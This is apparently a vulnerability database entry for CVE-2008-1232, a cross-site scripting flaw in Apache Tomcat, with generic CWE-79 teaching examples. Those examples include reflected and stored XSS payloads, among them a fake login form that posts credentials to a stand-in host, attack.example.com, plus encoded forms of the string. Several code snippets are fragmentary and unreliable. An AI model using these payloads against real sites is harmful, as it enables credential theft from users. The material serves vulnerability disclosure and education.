CVE-2008-1232 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Severity

43%

Complexity

86%

Confidentiality

48%

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

CVSS 2.0 Base Score 4.3. CVSS Attack Vector: network. CVSS Attack Complexity: medium. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N).

Demo Examples

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.


               
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as


               
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:


               
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:


               
</div></div>
</form>
<input type="submit" value="Login" />

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):


               
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:


               
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.


               
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.


               
<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.


               
Employee Name: <%= name %>
String name = rs.getString("name");

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.


               
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php


               
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php


               
echo '</div>';
exit;
//Print list of users to page
echo '<div class="userNames">'.$row['fullname'].'</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:


               
saveMessage($announceStr);//save HTML-formatted message to file; implementation details are irrelevant for this example.

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:


               
<script>document.alert('Hacked');</script>

The raw contents of the message file would look like:


               
<script>document.alert('Hacked');</script> has logged in.

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Overview

Type

Apache Software Foundation Tomcat

First reported 16 years ago

2008-08-04 01:41:00

Last updated 5 years ago

2019-03-25 11:30:00

Affected Software

Apache Software Foundation Tomcat 4.1.0

4.1.0

Apache Software Foundation Tomcat 4.1.1

4.1.1

Apache Software Foundation Tomcat 4.1.2

4.1.2

Apache Software Foundation Tomcat 4.1.3

4.1.3

Apache Software Foundation Tomcat 4.1.10

4.1.10

Apache Software Foundation Tomcat 4.1.12

4.1.12

Apache Software Foundation Tomcat 4.1.15

4.1.15

Apache Software Foundation Tomcat 4.1.24

4.1.24

Apache Software Foundation Tomcat 4.1.28

4.1.28

Apache Software Foundation Tomcat 4.1.31

4.1.31

Apache Software Foundation Tomcat 4.1.36

4.1.36

Apache Software Foundation Tomcat 5.5.0

5.5.0

Apache Software Foundation Tomcat 5.5.1

5.5.1

Apache Software Foundation Tomcat 5.5.2

5.5.2

Apache Software Foundation Tomcat 5.5.10

5.5.10

Apache Software Foundation Tomcat 5.5.11

5.5.11

Apache Software Foundation Tomcat 5.5.12

5.5.12

Apache Software Foundation Tomcat 5.5.13

5.5.13

Apache Software Foundation Tomcat 5.5.14

5.5.14

Apache Software Foundation Tomcat 5.5.15

5.5.15

Apache Software Foundation Tomcat 5.5.16

5.5.16

Apache Software Foundation Tomcat 5.5.17

5.5.17

Apache Software Foundation Tomcat 5.5.18

5.5.18

Apache Software Foundation Tomcat 5.5.19

5.5.19

Apache Software Foundation Tomcat 5.5.20

5.5.20

Apache Software Foundation Tomcat 5.5.21

5.5.21

Apache Software Foundation Tomcat 5.5.22

5.5.22

Apache Software Foundation Tomcat 5.5.23

5.5.23

Apache Software Foundation Tomcat 5.5.24

5.5.24

Apache Software Foundation Tomcat 5.5.25

5.5.25

Apache Software Foundation Tomcat 6.0

6.0

Apache Software Foundation Tomcat 6.0.0

6.0.0

Apache Software Foundation Tomcat 6.0.1

6.0.1

Apache Software Foundation Tomcat 6.0.10

6.0.10

Apache Software Foundation Tomcat 6.0.11

6.0.11

Apache Software Foundation Tomcat 6.0.12

6.0.12

Apache Software Foundation Tomcat 6.0.13

6.0.13

Apache Software Foundation Tomcat 6.0.14

6.0.14

Apache Software Foundation Tomcat 6.0.15

6.0.15

References

http://community.ca.com/blogs/casecurityresponseblog/archive/2009/06/15/ca20090615-02-ca-service-desk-tomcat-cross-site-scripting-vulnerability.aspx

APPLE-SA-2008-10-09

SUSE-SR:2008:018

SUSE-SR:2009:004

HPSBUX02401

HPSBST02955

31379

31381

31639

31865

31891

31982

32120

32222

32266

33797

33999

34013

35474

36108

37460

57126

4098

http://support.apple.com/kb/HT3216

http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm

http://tomcat.apache.org/security-4.html

http://tomcat.apache.org/security-5.html

http://tomcat.apache.org/security-6.html

MDVSA-2008:188

RHSA-2008:0648

RHSA-2008:0862

RHSA-2008:0864

20080801 [CVE-2008-1232] Apache Tomcat XSS vulnerability

20090616 CA20090615-02: CA Service Desk Tomcat Cross Site Scripting Vulnerability

20090806 CA20090806-02: Security Notice for Unicenter Asset Portfolio Management, Unicenter Desktop and Server Management, Unicenter Patch Management

20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components

30496

Exploit, Patch

31681

1020622

http://www.vmware.com/security/advisories/VMSA-2009-0002.html

http://www.vmware.com/security/advisories/VMSA-2009-0016.html

ADV-2008-2305

ADV-2008-2780

ADV-2008-2823

ADV-2009-0320

ADV-2009-0503

ADV-2009-1609

ADV-2009-2194

ADV-2009-3316

tomcat-httpservletresponse-xss(44155)

[tomcat-dev] 20190319 svn commit: r1855831 [22/30] - in /tomcat/site/trunk: ./ docs/ xdocs/

[tomcat-dev] 20190319 svn commit: r1855831 [21/30] - in /tomcat/site/trunk: ./ docs/ xdocs/

[tomcat-dev] 20190325 svn commit: r1856174 [20/29] - in /tomcat/site/trunk: docs/ xdocs/ xdocs/stylesheets/

[tomcat-dev] 20190325 svn commit: r1856174 [19/29] - in /tomcat/site/trunk: docs/ xdocs/ xdocs/stylesheets/

[tomcat-dev] 20200213 svn commit: r1873980 [25/34] - /tomcat/site/trunk/docs/

[tomcat-dev] 20200203 svn commit: r1873527 [22/30] - /tomcat/site/trunk/docs/

[tomcat-dev] 20200213 svn commit: r1873980 [24/34] - /tomcat/site/trunk/docs/

oval:org.mitre.oval:def:11181

oval:org.mitre.oval:def:5985

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=209500

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214095

FEDORA-2008-7977

FEDORA-2008-8113

FEDORA-2008-8130

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.